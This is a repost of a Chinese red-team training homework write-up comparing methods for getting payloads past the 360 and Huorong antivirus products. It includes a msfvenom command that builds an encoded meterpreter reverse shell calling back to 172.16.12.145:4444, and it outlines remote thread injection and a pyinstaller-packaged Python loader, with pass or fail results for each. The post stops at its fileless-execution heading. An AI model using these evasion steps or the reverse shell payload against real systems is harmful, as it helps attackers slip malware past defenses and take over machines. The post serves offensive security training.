admin管理员组文章数量:1637858
文章来源|MS08067 红队培训班第12节课作业
本文作者:汤浩荡(红队培训班1期学员)
按老师要求尝试完成布置的作业如下:
环境准备:
Kali linux安装cs4.2,Windows7系统安装火绒杀毒和360杀毒,为测试免杀并且防止联网查杀,关闭网络连接。
一.Shellcode远程线程注入
1.msf生成c语言木马
msfvenom --list encoder
//查看编码模块,经过测试x86和x64均不能使用,会导致无法上线
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.12.145 lport=4444 -e cmd/powershell_base64 -i 5 -f c -o 2.c
//-e指定编码方式,-i编码次数,-f指定生成文件类型
2.复制shellcode内容,使用加载器中远程线程注入.c生成免杀处理码 Gedit 1.c
//编辑生成的c语言木马,复制shellcode
使用vs2019建立项目,并生成源.cpp(内容为远程线程注入.c),替换shellcode,并将编译运行库替换为mt多线程。
3.将所生成的免杀码进行免杀测试,结果如下:
免杀通过!
二.python加载器
本免杀方式继续使用之前生成的shellcode,使用notepad++替换掉双引号、\x和\r\n
而后替换掉加载器中的shellcode部分,如下图:
使用pyinstaller将py文件生成为exe文件
复制该exe文件使用火绒和360进行免杀测试,结果如下:
该方法火绒免杀失败
三.无文件落地
版权声明:本文标题:红队培训班作业 | 免杀过360和火绒 四种方法大对比 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1729254925a1192557.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论